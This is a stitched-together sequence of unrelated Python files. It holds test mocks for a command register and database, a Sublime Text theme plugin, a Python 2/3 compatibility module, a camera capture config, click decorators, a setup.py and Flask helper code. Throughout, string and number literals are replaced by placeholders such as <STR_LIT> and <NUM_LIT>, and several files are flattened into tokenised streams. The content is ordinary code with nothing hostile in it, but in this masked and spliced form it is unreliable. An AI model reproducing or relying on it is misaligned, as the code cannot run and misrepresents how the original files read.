        # Fresh core mock per test (BaseTestCase hook).
        self.core_mock = flexmock()

    def test_Add_should_save_a_command_through_a_core_call(self):
        # Expect exactly one DB call when a command is registered.
        self._mock_db_method_once("<STR_LIT>")
        command_register = self._create_command_register_with_core_mock()
        command_register.Add(self._create_command_dictionary())

    def test_Search_should_use_a_core_call(self):
        self._mock_db_method_once("<STR_LIT>")
        command_register = self._create_command_register_with_core_mock()
        command_register.Search("<STR_LIT>")

    def test_AlreadyRegistered_should_return_False_for_not_registered_commands(self):
        command_register = self._create_command_register_with_core_mock()
        flexmock(command_register)
        # Empty search result -> command not registered.
        command_register.should_receive("<STR_LIT>").and_return([]).once()
        registered = command_register.AlreadyRegistered("<STR_LIT>")
        assert_that(registered, is_(False))

    def test_AlreadyRegistered_should_return_non_False_for_registered_commands(self):
        command_register = self._create_command_register_with_core_mock()
        flexmock(command_register)
        # Non-empty search result -> truthy (the matched target), not False.
        command_register.should_receive("<STR_LIT>").and_return([{'<STR_LIT>': '<STR_LIT>',
                                                                 '<STR_LIT>': '<STR_LIT:target>'}]).once()
        registered = command_register.AlreadyRegistered("<STR_LIT>")
        assert_that(registered, is_not(False))
        assert_that(registered is not None)

    def _mock_db_method_once(self, method):
        # Helper: attach a DB mock expecting `method` to be called once.
        db_mock = flexmock()
        db_mock.should_receive(method).once()
        self.core_mock.DB = db_mock

    def _create_command_register_with_core_mock(self):
        return CommandRegister(self.core_mock)

    def _create_command_dictionary(self):
        # Minimal command record accepted by CommandRegister.Add.
        return {'<STR_LIT>': '<STR_LIT>',
                '<STR_LIT>': '<STR_LIT>',
                '<STR_LIT>': '<STR_LIT>',
                '<STR_LIT>': '<STR_LIT>',
                '<STR_LIT>': '<STR_LIT>',
                '<STR_LIT>': '<STR_LIT>',
                '<STR_LIT>': '<STR_LIT>'}
from flexmock import flexmock
from framework.db.db import DB
import framework.db.db_handler as db_handler
from collections import defaultdict
from framework.lib import general


class DBEnvironmentBuilder():
    """Assembles a DB instance wired to a mocked core for tests."""

    def build(self):
        """Return a DB whose handler and core collaborators are mocked."""
        # Core mock must exist first: DB reads configuration through it.
        self._create_core_mock()
        db = flexmock(DB(self.core_mock))
        flexmock(db.DBHandler)
        db.DBHandler.should_receive("<STR_LIT>")
        # Seed handler storage with a single empty table record.
        db.DBHandler.Storage['<STR_LIT>'] = {"<STR_LIT>": {'<STR_LIT>': [], '<STR_LIT>': <NUM_LIT:0>}}
        # Keep the real implementation reachable before stubbing it.
        db.DBHandler.GetDBNames_old = db.DBHandler.GetDBNames
        db.DBHandler.should_receive("<STR_LIT>").and_return(["<STR_LIT>", "<STR_LIT>", "<STR_LIT>"])
        # Reset the module-level queue/dir mappings so tests start clean.
        general.INCOMING_QUEUE_TO_DIR_MAPPING = defaultdict(list)
        general.OUTGOING_QUEUE_TO_DIR_MAPPING = defaultdict(list)
        self.core_mock.DB = db
        return db

    def _create_core_mock(self):
        # Core mock exposes only the Config surface the DB touches.
        self.core_mock = flexmock()
        self.core_mock.Config = flexmock()
        self.core_mock.Config.should_receive("<STR_LIT>").and_return(["<STR_LIT:path>"])

        def fake_get(key):
            # Static lookup standing in for the real Config.Get; raises
            # KeyError for keys the tests do not expect to be read.
            values = {"<STR_LIT>": "<STR_LIT>",
                      "<STR_LIT>": "<STR_LIT>",
                      "<STR_LIT>": "<STR_LIT>",
                      "<STR_LIT>": "<STR_LIT>",
                      "<STR_LIT>": True,
                      "<STR_LIT>": "<STR_LIT>",
                      "<STR_LIT>": "<STR_LIT:path>"}
            return values[key]
        self.core_mock.Config.Get = fake_get
<s> import sublime , sublime_plugin <EOL> import subprocess <EOL> import re <EOL> class GTKDarkThemeVariantSetter ( sublime_plugin . EventListener ) : <EOL> def get_output_matches ( self , arguments , pattern ) : <EOL> output = subprocess . Popen ( arguments , stdout = subprocess . PIPE ) . communicate ( ) [ <NUM_LIT:0> ] <EOL> return re . findall ( pattern , output . decode ( "<STR_LIT:utf-8>" ) ) <EOL> def get_sublime_pids ( self ) : <EOL> return self . get_output_matches ( [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] , "<STR_LIT>" ) <EOL> def get_window_ids ( self ) : <EOL> return self . get_output_matches ( [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] , "<STR_LIT>" ) <EOL> def get_pid_from_window_id ( self , window_id ) : <EOL> return self . get_output_matches ( [ "<STR_LIT>" , "<STR_LIT>" , window_id , "<STR_LIT>" ] , "<STR_LIT>" ) [ <NUM_LIT:0> ] <EOL> def set_dark_theme ( self , window_id ) : <EOL> subprocess . call ( [ "<STR_LIT>" , "<STR_LIT>" , window_id , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> def on_activated ( self , view ) : <EOL> sublime_pids = self . get_sublime_pids ( ) <EOL> for window_id in self . get_window_ids ( ) : <EOL> if self . get_pid_from_window_id ( window_id ) in sublime_pids : <EOL> self . set_dark_theme ( window_id ) </s>
<s> """<STR_LIT>""" <EOL> __all__ = [ "<STR_LIT>" , "<STR_LIT:int>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] <EOL> import sys <EOL> PY3 = sys . version_info >= ( <NUM_LIT:3> , ) <EOL> try : <EOL> import __builtin__ <EOL> except ImportError : <EOL> import builtins as __builtin__ <EOL> if PY3 : <EOL> int = int <EOL> long = int <EOL> xrange = range <EOL> exec_ = getattr ( __builtin__ , "<STR_LIT>" ) <EOL> print_ = getattr ( __builtin__ , "<STR_LIT>" ) <EOL> else : <EOL> int = int <EOL> long = long <EOL> xrange = xrange <EOL> def exec_ ( code , globs = None , locs = None ) : <EOL> if globs is None : <EOL> frame = _sys . _getframe ( <NUM_LIT:1> ) <EOL> globs = frame . f_globals <EOL> if locs is None : <EOL> locs = frame . f_locals <EOL> del frame <EOL> elif locs is None : <EOL> locs = globs <EOL> exec ( """<STR_LIT>""" ) <EOL> def print_ ( s ) : <EOL> sys . stdout . write ( s + '<STR_LIT:\n>' ) <EOL> sys . stdout . flush ( ) <EOL> try : <EOL> callable = callable <EOL> except Exception : <EOL> def callable ( obj ) : <EOL> for klass in type ( obj ) . __mro__ : <EOL> if "<STR_LIT>" in klass . __dict__ : <EOL> return True <EOL> return False <EOL> try : <EOL> from collections import namedtuple <EOL> except ImportError : <EOL> from operator import itemgetter as _itemgetter <EOL> from keyword import iskeyword as _iskeyword <EOL> import sys as _sys <EOL> def namedtuple ( typename , field_names , verbose = False , rename = False ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( field_names , basestring ) : <EOL> field_names = field_names . replace ( '<STR_LIT:U+002C>' , '<STR_LIT:U+0020>' ) . split ( ) <EOL> field_names = tuple ( map ( str , field_names ) ) <EOL> if rename : <EOL> names = list ( field_names ) <EOL> seen = set ( ) <EOL> for i , name in enumerate ( names ) : <EOL> if ( not min ( c . isalnum ( ) or c == '<STR_LIT:_>' for c in name ) or _iskeyword ( name ) <EOL> or not name or name [ <NUM_LIT:0> ] . 
isdigit ( ) or name . startswith ( '<STR_LIT:_>' ) <EOL> or name in seen ) : <EOL> names [ i ] = '<STR_LIT>' % i <EOL> seen . add ( name ) <EOL> field_names = tuple ( names ) <EOL> for name in ( typename , ) + field_names : <EOL> if not min ( c . isalnum ( ) or c == '<STR_LIT:_>' for c in name ) : <EOL> raise ValueError ( '<STR_LIT>' '<STR_LIT>' <EOL> % name ) <EOL> if _iskeyword ( name ) : <EOL> raise ValueError ( '<STR_LIT>' % name ) <EOL> if name [ <NUM_LIT:0> ] . isdigit ( ) : <EOL> raise ValueError ( '<STR_LIT>' '<STR_LIT>' % name ) <EOL> seen_names = set ( ) <EOL> for name in field_names : <EOL> if name . startswith ( '<STR_LIT:_>' ) and not rename : <EOL> raise ValueError ( '<STR_LIT>' <EOL> % name ) <EOL> if name in seen_names : <EOL> raise ValueError ( '<STR_LIT>' % name ) <EOL> seen_names . add ( name ) <EOL> numfields = len ( field_names ) <EOL> argtxt = repr ( field_names ) . replace ( "<STR_LIT:'>" , "<STR_LIT>" ) [ <NUM_LIT:1> : - <NUM_LIT:1> ] <EOL> reprtxt = '<STR_LIT:U+002CU+0020>' . join ( '<STR_LIT>' % name for name in field_names ) <EOL> template = '''<STR_LIT>''' % locals ( ) <EOL> for i , name in enumerate ( field_names ) : <EOL> template += '<STR_LIT>' % ( name , i ) <EOL> if verbose : <EOL> sys . stdout . write ( template + '<STR_LIT:\n>' ) <EOL> sys . stdout . flush ( ) <EOL> namespace = dict ( _itemgetter = _itemgetter , __name__ = '<STR_LIT>' % typename , <EOL> _property = property , _tuple = tuple ) <EOL> try : <EOL> exec_ ( template , namespace ) <EOL> except SyntaxError : <EOL> e = sys . exc_info ( ) [ <NUM_LIT:1> ] <EOL> raise SyntaxError ( e . message + '<STR_LIT>' + template ) <EOL> result = namespace [ typename ] <EOL> try : <EOL> result . __module__ = _sys . _getframe ( <NUM_LIT:1> ) . f_globals . 
get ( '<STR_LIT>' , '<STR_LIT:__main__>' ) <EOL> except ( AttributeError , ValueError ) : <EOL> pass <EOL> return result <EOL> if hasattr ( property , '<STR_LIT>' ) : <EOL> property = property <EOL> else : <EOL> class property ( __builtin__ . property ) : <EOL> __metaclass__ = type <EOL> def __init__ ( self , fget , * args , ** kwargs ) : <EOL> super ( property , self ) . __init__ ( fget , * args , ** kwargs ) <EOL> self . __doc__ = fget . __doc__ <EOL> def getter ( self , method ) : <EOL> return property ( method , self . fset , self . fdel ) <EOL> def setter ( self , method ) : <EOL> return property ( self . fget , method , self . fdel ) <EOL> def deleter ( self , method ) : <EOL> return property ( self . fget , self . fset , method ) <EOL> try : <EOL> from collections import defaultdict <EOL> except ImportError : <EOL> class defaultdict ( dict ) : <EOL> def __init__ ( self , default_factory = None , * a , ** kw ) : <EOL> if ( default_factory is not None and <EOL> not hasattr ( default_factory , '<STR_LIT>' ) ) : <EOL> raise TypeError ( '<STR_LIT>' ) <EOL> dict . __init__ ( self , * a , ** kw ) <EOL> self . default_factory = default_factory <EOL> def __getitem__ ( self , key ) : <EOL> try : <EOL> return dict . __getitem__ ( self , key ) <EOL> except KeyError : <EOL> return self . __missing__ ( key ) <EOL> def __missing__ ( self , key ) : <EOL> if self . default_factory is None : <EOL> raise KeyError ( key ) <EOL> self [ key ] = value = self . default_factory ( ) <EOL> return value <EOL> def __reduce__ ( self ) : <EOL> if self . default_factory is None : <EOL> args = tuple ( ) <EOL> else : <EOL> args = self . default_factory , <EOL> return type ( self ) , args , None , None , self . items ( ) <EOL> def copy ( self ) : <EOL> return self . __copy__ ( ) <EOL> def __copy__ ( self ) : <EOL> return type ( self ) ( self . default_factory , self ) <EOL> def __deepcopy__ ( self , memo ) : <EOL> import copy <EOL> return type ( self ) ( self . default_factory , <EOL> copy . 
deepcopy ( self . items ( ) ) ) <EOL> def __repr__ ( self ) : <EOL> return '<STR_LIT>' % ( self . default_factory , <EOL> dict . __repr__ ( self ) ) <EOL> try : <EOL> from functools import wraps <EOL> except ImportError : <EOL> def wraps ( original ) : <EOL> def inner ( fn ) : <EOL> for attribute in [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] : <EOL> setattr ( fn , attribute , getattr ( original , attribute ) ) <EOL> for attribute in [ '<STR_LIT>' , <EOL> ] : <EOL> if hasattr ( fn , attribute ) : <EOL> getattr ( fn , attribute ) . update ( getattr ( original , attribute ) ) <EOL> else : <EOL> setattr ( fn , attribute , <EOL> getattr ( original , attribute ) . copy ( ) ) <EOL> return fn <EOL> return inner </s>
# Flat configuration module for a camera motion/timelapse capture script.
# NOTE(review): literal values are masked in this corpus; the meaning of
# each setting is inferred from its name — confirm against project docs.

configTitle = "<STR_LIT>"
configName = "<STR_LIT>"

# --- general behaviour flags ---
verbose = True
logDataToFile = False
debug = False

# --- still image capture ---
imageTestPrint = False
imageNamePrefix = '<STR_LIT>'
imageWidth = <NUM_LIT>
imageHeight = <NUM_LIT>
imageVFlip = False
imageHFlip = False
imagePreview = False

# --- day/night capture windows ---
noNightShots = False
noDayShots = False
nightMaxShut = <NUM_LIT>
nightMinShut = <NUM_LIT>
nightMaxISO = <NUM_LIT>
nightMinISO = <NUM_LIT:100>
nightSleepSec = <NUM_LIT:10>
twilightThreshold = <NUM_LIT:50>

# --- on-image text overlay ---
showDateOnImage = True
showTextFontSize = <NUM_LIT>
showTextBottom = True
showTextWhite = True
showTextWhiteNight = True

# --- motion detection ---
motionOn = True
motionPrefix = "<STR_LIT>"
motionDir = "<STR_LIT>"
threshold = <NUM_LIT:10>
sensitivity = <NUM_LIT:200>
motionVideoOn = False
motionVideoTimer = <NUM_LIT:10>
motionQuickTLOn = False
motionQuickTLTimer = <NUM_LIT:10>
motionQuickTLInterval = <NUM_LIT:0>
motionForce = <NUM_LIT> * <NUM_LIT>
motionNumOn = True
motionNumStart = <NUM_LIT:1000>
motionNumMax = <NUM_LIT>
motionNumRecycle = True
motionMaxDots = <NUM_LIT:100>
createLockFile = True

# --- timelapse capture ---
timelapseOn = False
timelapseTimer = <NUM_LIT:5> * <NUM_LIT>
timelapseDir = "<STR_LIT>"
timelapsePrefix = "<STR_LIT>"
timelapseExit = <NUM_LIT:0> * <NUM_LIT>
timelapseNumOn = True
timelapseNumStart = <NUM_LIT:1000>
timelapseNumMax = <NUM_LIT>
timelapseNumRecycle = True
import sys
import inspect

from functools import update_wrapper

from ._compat import iteritems
from ._unicodefun import _check_for_unicode_literals
from .utils import echo
from .globals import get_current_context


def pass_context(f):
    """<STR_LIT>"""
    # Inject the active click Context as the first positional argument.
    def new_func(*args, **kwargs):
        return f(get_current_context(), *args, **kwargs)
    return update_wrapper(new_func, f)


def pass_obj(f):
    """<STR_LIT>"""
    # Like pass_context, but forwards only the context's `obj`.
    def new_func(*args, **kwargs):
        return f(get_current_context().obj, *args, **kwargs)
    return update_wrapper(new_func, f)


def make_pass_decorator(object_type, ensure=False):
    """<STR_LIT>"""
    def decorator(f):
        def new_func(*args, **kwargs):
            ctx = get_current_context()
            # ensure=True creates the object if missing; otherwise walk
            # up the context chain looking for one.
            if ensure:
                obj = ctx.ensure_object(object_type)
            else:
                obj = ctx.find_object(object_type)
            if obj is None:
                raise RuntimeError('<STR_LIT>'
                                   '<STR_LIT>'
                                   % object_type.__name__)
            # ctx.invoke substitutes the located object for the implicit
            # first positional argument.
            return ctx.invoke(f, obj, *args[<NUM_LIT:1>:], **kwargs)
        return update_wrapper(new_func, f)
    return decorator


def _make_command(f, name, attrs, cls):
    # Reject double decoration: f must still be a plain function.
    if isinstance(f, Command):
        raise TypeError('<STR_LIT>'
                        '<STR_LIT>')
    try:
        params = f.__click_params__
        # Parameter decorators are applied bottom-up; reverse restores
        # declaration order.
        params.reverse()
        del f.__click_params__
    except AttributeError:
        params = []
    help = attrs.get('<STR_LIT>')
    if help is None:
        help = inspect.getdoc(f)
        if isinstance(help, bytes):
            help = help.decode('<STR_LIT:utf-8>')
    else:
        help = inspect.cleandoc(help)
    attrs['<STR_LIT>'] = help
    _check_for_unicode_literals()
    return cls(name=name or f.__name__.lower(),
               callback=f, params=params, **attrs)


def command(name=None, cls=None, **attrs):
    """<STR_LIT>"""
    if cls is None:
        cls = Command

    def decorator(f):
        cmd = _make_command(f, name, attrs, cls)
        # Preserve the original function's docstring on the command.
        cmd.__doc__ = f.__doc__
        return cmd
    return decorator


def group(name=None, **attrs):
    """<STR_LIT>"""
    # A group is just a command with the Group class as default.
    attrs.setdefault('<STR_LIT>', Group)
    return command(name, **attrs)


def _param_memo(f, param):
    # Commands take params directly; plain functions accumulate them on
    # __click_params__ until _make_command collects them.
    if isinstance(f, Command):
        f.params.append(param)
    else:
        if not hasattr(f, '<STR_LIT>'):
            f.__click_params__ = []
        f.__click_params__.append(param)


def argument(*param_decls, **attrs):
    """<STR_LIT>"""
    def decorator(f):
        ArgumentClass = attrs.pop('<STR_LIT>', Argument)
        _param_memo(f, ArgumentClass(param_decls, **attrs))
        return f
    return decorator


def option(*param_decls, **attrs):
    """<STR_LIT>"""
    def decorator(f):
        # Normalize indentation of multi-line help text.
        if '<STR_LIT>' in attrs:
            attrs['<STR_LIT>'] = inspect.cleandoc(attrs['<STR_LIT>'])
        OptionClass = attrs.pop('<STR_LIT>', Option)
        _param_memo(f, OptionClass(param_decls, **attrs))
        return f
    return decorator


def confirmation_option(*param_decls, **attrs):
    """<STR_LIT>"""
    def decorator(f):
        def callback(ctx, param, value):
            # Abort the whole invocation unless the user confirmed.
            if not value:
                ctx.abort()
        attrs.setdefault('<STR_LIT>', True)
        attrs.setdefault('<STR_LIT>', callback)
        attrs.setdefault('<STR_LIT>', False)
        attrs.setdefault('<STR_LIT>', '<STR_LIT>')
        attrs.setdefault('<STR_LIT>', '<STR_LIT>')
        return option(*(param_decls or ('<STR_LIT>',)), **attrs)(f)
    return decorator


def password_option(*param_decls, **attrs):
    """<STR_LIT>"""
    def decorator(f):
        attrs.setdefault('<STR_LIT>', True)
        attrs.setdefault('<STR_LIT>', True)
        attrs.setdefault('<STR_LIT>', True)
        return option(*(param_decls or ('<STR_LIT>',)), **attrs)(f)
    return decorator


def version_option(version=None, *param_decls, **attrs):
    """<STR_LIT>"""
    if version is None:
        # Capture the caller's module so the version can later be looked
        # up from the installed distribution's entry points.
        module = sys._getframe(<NUM_LIT:1>).f_globals.get('<STR_LIT>')

    def decorator(f):
        prog_name = attrs.pop('<STR_LIT>', None)
        message = attrs.pop('<STR_LIT:message>', '<STR_LIT>')

        def callback(ctx, param, value):
            if not value or ctx.resilient_parsing:
                return
            prog = prog_name
            if prog is None:
                prog = ctx.find_root().info_name
            ver = version
            if ver is None:
                # Best-effort version discovery via pkg_resources.
                try:
                    import pkg_resources
                except ImportError:
                    pass
                else:
                    for dist in pkg_resources.working_set:
                        scripts = dist.get_entry_map().get('<STR_LIT>') or {}
                        for script_name, entry_point in iteritems(scripts):
                            if entry_point.module_name == module:
                                ver = dist.version
                                break
                if ver is None:
                    raise RuntimeError('<STR_LIT>')
            echo(message % {
                '<STR_LIT>': prog,
                '<STR_LIT:version>': ver,
            }, color=ctx.color)
            ctx.exit()
        attrs.setdefault('<STR_LIT>', True)
        attrs.setdefault('<STR_LIT>', False)
        attrs.setdefault('<STR_LIT>', True)
        attrs.setdefault('<STR_LIT>', '<STR_LIT>')
        attrs['<STR_LIT>'] = callback
        return option(*(param_decls or ('<STR_LIT>',)), **attrs)(f)
    return decorator


def help_option(*param_decls, **attrs):
    """<STR_LIT>"""
    def decorator(f):
        def callback(ctx, param, value):
            if value and not ctx.resilient_parsing:
                echo(ctx.get_help(), color=ctx.color)
                ctx.exit()
        attrs.setdefault('<STR_LIT>', True)
        attrs.setdefault('<STR_LIT>', False)
        attrs.setdefault('<STR_LIT>', '<STR_LIT>')
        attrs.setdefault('<STR_LIT>', True)
        attrs['<STR_LIT>'] = callback
        return option(*(param_decls or ('<STR_LIT>',)), **attrs)(f)
    return decorator


# Imported at the bottom to avoid a circular import with .core.
from .core import Command, Group, Argument, Option
from setuptools import setup

# Packaging metadata collected in one mapping, then splatted into
# setup(); behavior is identical to passing the keywords directly.
_SETUP_KWARGS = dict(
    name='<STR_LIT>',
    version='<STR_LIT:1.0>',
    py_modules=['<STR_LIT>'],
    include_package_data=True,
    install_requires=[
        '<STR_LIT>',
        '<STR_LIT>',
    ],
    entry_points='''<STR_LIT>''',
)

setup(**_SETUP_KWARGS)
import re
import creoleparser
from datetime import datetime, timedelta
from genshi import builder
from functools import wraps
from creoleparser.elements import PreBlock
from pygments import highlight
from pygments.formatters import HtmlFormatter
from pygments.lexers import get_lexer_by_name
from pygments.util import ClassNotFound
from flask import g, url_for, flash, abort, request, redirect, Markup
from flask_website.flaskystyle import FlaskyStyle

pygments_formatter = HtmlFormatter(style=FlaskyStyle)

# Splitter used by split_lines_wrapping to break long lines on whitespace.
_ws_split_re = re.compile(r'<STR_LIT>')

# (unit name, seconds per unit), largest first; consumed in order by
# format_timedelta.
TIMEDELTA_UNITS = (
    ('<STR_LIT>', <NUM_LIT> * <NUM_LIT> * <NUM_LIT>),
    ('<STR_LIT>', <NUM_LIT> * <NUM_LIT> * <NUM_LIT:30>),
    ('<STR_LIT>', <NUM_LIT> * <NUM_LIT> * <NUM_LIT:7>),
    ('<STR_LIT>', <NUM_LIT> * <NUM_LIT>),
    ('<STR_LIT>', <NUM_LIT>),
    ('<STR_LIT>', <NUM_LIT>),
    ('<STR_LIT>', <NUM_LIT:1>)
)


class CodeBlock(PreBlock):
    """Creole pre-block that pygmentizes code when a lexer is named."""

    def __init__(self):
        super(CodeBlock, self).__init__('<STR_LIT>', ['<STR_LIT>', '<STR_LIT>'])

    def _build(self, mo, element_store, environ):
        lines = self.regexp2.sub(r'<STR_LIT>', mo.group(<NUM_LIT:1>)).splitlines()
        if lines and lines[<NUM_LIT:0>].startswith('<STR_LIT>'):
            try:
                # First line selects the pygments lexer.
                lexer = get_lexer_by_name(lines.pop(<NUM_LIT:0>)[<NUM_LIT:2>:].strip())
            except ClassNotFound:
                pass  # unknown language: fall through to a plain <pre>
            else:
                return Markup(highlight(u'<STR_LIT:\n>'.join(lines), lexer,
                                        pygments_formatter))
        return builder.tag.pre(u'<STR_LIT:\n>'.join(lines))


# Custom creole dialect: inline images disabled, code blocks highlighted.
custom_dialect = creoleparser.create_dialect(creoleparser.creole10_base)
custom_dialect.img = custom_dialect.no_wiki
custom_dialect.pre = CodeBlock()

_parser = creoleparser.Parser(
    dialect=custom_dialect,
    method='<STR_LIT:html>'
)


def format_creole(text):
    """Render creole markup to markup-safe HTML."""
    return Markup(_parser.render(text, encoding=None))


def split_lines_wrapping(text, width=<NUM_LIT>, threshold=<NUM_LIT>):
    """Split text into lines, soft-wrapping lines longer than threshold."""
    lines = text.splitlines()
    # Fast path: nothing needs wrapping.
    if all(len(line) <= threshold for line in lines):
        return lines
    result = []
    for line in lines:
        if len(line) <= threshold:
            result.append(line)
            continue
        line_width = <NUM_LIT:0>
        line_buffer = []
        for piece in _ws_split_re.split(line):
            line_width += len(piece)
            if line_width > width:
                # Flush the current visual line and start a new one;
                # whitespace pieces are dropped at the break point.
                result.append(u'<STR_LIT>'.join(line_buffer))
                line_buffer = []
                if not piece.isspace():
                    line_buffer.append(piece)
                    line_width = len(piece)
                else:
                    line_width = <NUM_LIT:0>
            else:
                line_buffer.append(piece)
        if line_buffer:
            result.append(u'<STR_LIT>'.join(line_buffer))
    return result


def request_wants_json():
    # JSON wins only when it is accepted with strictly higher quality
    # than HTML; best_match prefers HTML on ties (typical browsers).
    best = request.accept_mimetypes.best_match(['<STR_LIT:application/json>', '<STR_LIT>'])
    return best == '<STR_LIT:application/json>' and request.accept_mimetypes[best] > request.accept_mimetypes['<STR_LIT>']


def requires_login(f):
    """View decorator: redirect anonymous users to the login page."""
    @wraps(f)
    def decorated_function(*args, **kwargs):
        if g.user is None:
            flash(u'<STR_LIT>')
            return redirect(url_for('<STR_LIT>', next=request.path))
        return f(*args, **kwargs)
    return decorated_function


def requires_admin(f):
    """View decorator: login required, then admin required."""
    @wraps(f)
    def decorated_function(*args, **kwargs):
        if not g.user.is_admin:
            abort(<NUM_LIT>)
        return f(*args, **kwargs)
    # Wrap in requires_login so anonymous users are redirected first.
    return requires_login(decorated_function)


def format_datetime(dt):
    return dt.strftime('<STR_LIT>')


def format_date(dt):
    return dt.strftime('<STR_LIT>')


def format_timedelta(delta, granularity='<STR_LIT>', threshold=<NUM_LIT>):
    """Humanize a timedelta/seconds count (datetimes: relative to utcnow)."""
    if isinstance(delta, datetime):
        delta = datetime.utcnow() - delta
    if isinstance(delta, timedelta):
        seconds = int((delta.days * <NUM_LIT>) + delta.seconds)
    else:
        seconds = delta
    for unit, secs_per_unit in TIMEDELTA_UNITS:
        value = abs(seconds) / secs_per_unit
        if value >= threshold or unit == granularity:
            if unit == granularity and value > <NUM_LIT:0>:
                value = max(<NUM_LIT:1>, value)
            value = int(round(value))
            rv = u'<STR_LIT>' % (value, unit)
            if value != <NUM_LIT:1>:
                rv += u'<STR_LIT:s>'
            return rv
    return u'<STR_LIT>'


def display_openid(openid):
    """Strip scheme and trailing slash for compact OpenID display."""
    if not openid:
        return '<STR_LIT>'
    rv = openid
    if rv.startswith(('<STR_LIT>', '<STR_LIT>')):
        rv = rv.split('<STR_LIT:/>', <NUM_LIT:2>)[-<NUM_LIT:1>]
    return rv.rstrip('<STR_LIT:/>')
<s> """<STR_LIT>""" <EOL> from . _compat import implements_to_string , text_type <EOL> from . app import Flask <EOL> from . blueprints import Blueprint <EOL> from . globals import _request_ctx_stack <EOL> class UnexpectedUnicodeError ( AssertionError , UnicodeError ) : <EOL> """<STR_LIT>""" <EOL> @ implements_to_string <EOL> class DebugFilesKeyError ( KeyError , AssertionError ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , request , key ) : <EOL> form_matches = request . form . getlist ( key ) <EOL> buf = [ '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' % <EOL> ( key , request . mimetype ) ] <EOL> if form_matches : <EOL> buf . append ( '<STR_LIT>' <EOL> '<STR_LIT>' % '<STR_LIT:U+002CU+0020>' . join ( '<STR_LIT>' % x <EOL> for x in form_matches ) ) <EOL> self . msg = '<STR_LIT>' . join ( buf ) <EOL> def __str__ ( self ) : <EOL> return self . msg <EOL> class FormDataRoutingRedirect ( AssertionError ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , request ) : <EOL> exc = request . routing_exception <EOL> buf = [ '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> % ( request . url , exc . new_url ) ] <EOL> if request . base_url + '<STR_LIT:/>' == exc . new_url . split ( '<STR_LIT:?>' ) [ <NUM_LIT:0> ] : <EOL> buf . append ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> buf . append ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' % <EOL> request . method ) <EOL> buf . append ( '<STR_LIT>' ) <EOL> AssertionError . __init__ ( self , '<STR_LIT>' . join ( buf ) . encode ( '<STR_LIT:utf-8>' ) ) <EOL> def attach_enctype_error_multidict ( request ) : <EOL> """<STR_LIT>""" <EOL> oldcls = request . files . __class__ <EOL> class newcls ( oldcls ) : <EOL> def __getitem__ ( self , key ) : <EOL> try : <EOL> return oldcls . __getitem__ ( self , key ) <EOL> except KeyError : <EOL> if key not in request . form : <EOL> raise <EOL> raise DebugFilesKeyError ( request , key ) <EOL> newcls . __name__ = oldcls . 
__name__ <EOL> newcls . __module__ = oldcls . __module__ <EOL> request . files . __class__ = newcls <EOL> def _dump_loader_info ( loader ) : <EOL> yield '<STR_LIT>' % ( type ( loader ) . __module__ , type ( loader ) . __name__ ) <EOL> for key , value in sorted ( loader . __dict__ . items ( ) ) : <EOL> if key . startswith ( '<STR_LIT:_>' ) : <EOL> continue <EOL> if isinstance ( value , ( tuple , list ) ) : <EOL> if not all ( isinstance ( x , ( str , text_type ) ) for x in value ) : <EOL> continue <EOL> yield '<STR_LIT>' % key <EOL> for item in value : <EOL> yield '<STR_LIT>' % item <EOL> continue <EOL> elif not isinstance ( value , ( str , text_type , int , float , bool ) ) : <EOL> continue <EOL> yield '<STR_LIT>' % ( key , value ) <EOL> def explain_template_loading_attempts ( app , template , attempts ) : <EOL> """<STR_LIT>""" <EOL> info = [ '<STR_LIT>' % template ] <EOL> total_found = <NUM_LIT:0> <EOL> blueprint = None <EOL> reqctx = _request_ctx_stack . top <EOL> if reqctx is not None and reqctx . request . blueprint is not None : <EOL> blueprint = reqctx . request . blueprint <EOL> for idx , ( loader , srcobj , triple ) in enumerate ( attempts ) : <EOL> if isinstance ( srcobj , Flask ) : <EOL> src_info = '<STR_LIT>' % srcobj . import_name <EOL> elif isinstance ( srcobj , Blueprint ) : <EOL> src_info = '<STR_LIT>' % ( srcobj . name , <EOL> srcobj . import_name ) <EOL> else : <EOL> src_info = repr ( srcobj ) <EOL> info . append ( '<STR_LIT>' % ( <EOL> idx + <NUM_LIT:1> , src_info ) ) <EOL> for line in _dump_loader_info ( loader ) : <EOL> info . append ( '<STR_LIT>' % line ) <EOL> if triple is None : <EOL> detail = '<STR_LIT>' <EOL> else : <EOL> detail = '<STR_LIT>' % ( triple [ <NUM_LIT:1> ] or '<STR_LIT>' ) <EOL> total_found += <NUM_LIT:1> <EOL> info . append ( '<STR_LIT>' % detail ) <EOL> seems_fishy = False <EOL> if total_found == <NUM_LIT:0> : <EOL> info . append ( '<STR_LIT>' ) <EOL> seems_fishy = True <EOL> elif total_found > <NUM_LIT:1> : <EOL> info . 
append ( '<STR_LIT>' ) <EOL> seems_fishy = True <EOL> if blueprint is not None and seems_fishy : <EOL> info . append ( '<STR_LIT>' <EOL> '<STR_LIT>' % blueprint ) <EOL> info . append ( '<STR_LIT>' ) <EOL> info . append ( '<STR_LIT>' ) <EOL> app . logger . info ( '<STR_LIT:\n>' . join ( info ) ) </s>
